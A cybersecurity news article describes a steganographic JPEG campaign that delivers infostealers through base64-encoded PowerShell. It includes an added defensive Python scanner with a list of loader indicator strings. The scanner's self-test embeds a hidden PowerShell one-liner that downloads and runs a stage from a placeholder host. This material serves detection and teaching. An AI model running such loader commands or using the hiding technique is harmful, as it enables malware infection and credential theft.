Cyber Security News

New Steganographic Malware Exploits JPEG Files to Distribute Infostealers

A sophisticated malware campaign employing steganographic techniques has recently been identified, targeting users through seemingly innocent JPEG image files.

The image files carry concealed malicious code; once that code is extracted from the image and run, it starts a multi-stage chain designed to steal sensitive information from the victim's system.

This new threat represents a concerning evolution in malware distribution methods, combining social engineering with advanced obfuscation techniques.

The attack begins with victims being lured into downloading what appears to be a standard JPEG file.

These images, however, carry concealed scripts that signature-based scanners struggle to flag, because the script data sits inside an otherwise valid image file.

Viewing the image is not what triggers the infection: the hidden code first has to be extracted from the file, after which it runs silently in the background.

Broadcom analysts found that the malware uses a multi-stage infection process that begins with the extraction of the hidden payload from the image file.

“The steganographic technique used in this campaign is particularly sophisticated, making detection challenging for traditional security tools,” noted the researchers in their technical analysis.

Upon execution, the malware targets credential repositories in browsers, email clients, and FTP applications.

The extracted data is then exfiltrated to command-and-control servers while additional payloads are downloaded, including customized versions of known infostealer families such as Vidar, Raccoon, and Redline.

Attack Analysis

The malware authors obfuscated their PowerShell scripts, base64-encoding the embedded commands so that the plaintext never appears in the file for a scanner to match.

The initial script, after being extracted from the JPEG file, uses Windows Script Host to execute commands with minimal visibility.
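As an added example (this is not code from the article or from Broadcom's analysis), the following Python script shows the two checks a defender would run against the loader steps described above: carving out whatever sits after a JPEG's end-of-image marker, and base64-decoding it to look for PowerShell indicators. It assumes the payload is appended after the EOI marker, a common placement that the article does not confirm for this campaign; the indicator list, the sample JPEG bytes and the loader one-liner are constructed for the demonstration, and `example.invalid` never resolves.

```python
import base64
import binascii
import re
from typing import Optional

# Strings that loaders built around base64-encoded PowerShell commonly contain
# (assumed indicator list; not taken from the Broadcom analysis).
INDICATORS = ("powershell", "iex", "invoke-expression", "downloadstring",
              "frombase64string", "wscript.shell", "-encodedcommand", "-enc ")


def find_eoi(data: bytes) -> int:
    """Walk the JPEG segment structure and return the offset just past EOI.

    Parsing segments (rather than searching for the last FF D9) means appended
    data that itself contains FF D9 cannot hide the true end of the image.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI: the image proper ends here
            return pos + 2
        if marker == 0xFF:                      # fill byte before a marker
            pos += 1
            continue
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:   # standalone markers
            pos += 2
            continue
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seg_len
        if marker == 0xDA:                      # SOS: skip the entropy-coded scan data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                # FF 00 is a stuffed byte and FF D0..D7 are restart markers;
                # any other FF xx is the next real marker.
                if data[pos] == 0xFF and nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("not a JPEG: no EOI marker found")


def decode_trailer(trailer: bytes) -> Optional[str]:
    """Base64-decode bytes found after EOI; handle the UTF-16LE text that
    PowerShell's -EncodedCommand expects as well as plain ASCII scripts."""
    cleaned = re.sub(rb"\s+", b"", trailer)
    if not cleaned:
        return None
    try:
        raw = base64.b64decode(cleaned, validate=True)
    except binascii.Error:
        return None
    if len(raw) >= 2 and raw[1] == 0:           # ASCII text in UTF-16LE has NUL high bytes
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def scan_jpeg(data: bytes) -> dict:
    """Report how much data follows EOI and which loader indicators it decodes to."""
    trailer = data[find_eoi(data):]
    text = decode_trailer(trailer)
    lowered = text.lower() if text else ""
    return {
        "trailer_bytes": len(trailer),
        "decoded": text,
        "indicators": [i for i in INDICATORS if i in lowered],
    }


def build_sample_jpeg(script: str = "", utf16: bool = False) -> bytes:
    """Constructed test input: a structurally valid (not decodable) JPEG with an
    optional base64-encoded script appended after EOI, the way a loader could
    later carve it back out. utf16=True mimics a -EncodedCommand payload."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78\x9a"   # stuffed byte and RST0 inside scan data
    image = b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9"
    if not script:
        return image
    encoded = script.encode("utf-16-le") if utf16 else script.encode()
    return image + base64.b64encode(encoded)


if __name__ == "__main__":
    # Hypothetical loader one-liner, constructed for the demonstration.
    sample = build_sample_jpeg(
        "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://example.invalid/stage2')\"")
    print(scan_jpeg(sample))
```

Running the script prints the trailer size, the decoded one-liner and the matched indicators for the constructed sample. The check only covers data appended after EOI; a payload stored inside an APP/COM segment or spread across pixel bits would pass this scan, so segment contents and image statistics need separate inspection.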

The malicious code identified includes instructions for harvesting credentials from multiple browsers, with specific functions targeting cookie files, saved passwords, and form data.

Broadcom's Symantec security products detect components of this chain under the signatures ACM.Ps-Base64!g1, ISB.Downloader!gen80, and Heur.AdvML.B, the last of which is a generic machine-learning verdict rather than a family-specific signature.

Users are advised to exercise caution when downloading image files from untrusted sources and ensure their security solutions are updated with the latest definitions.


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
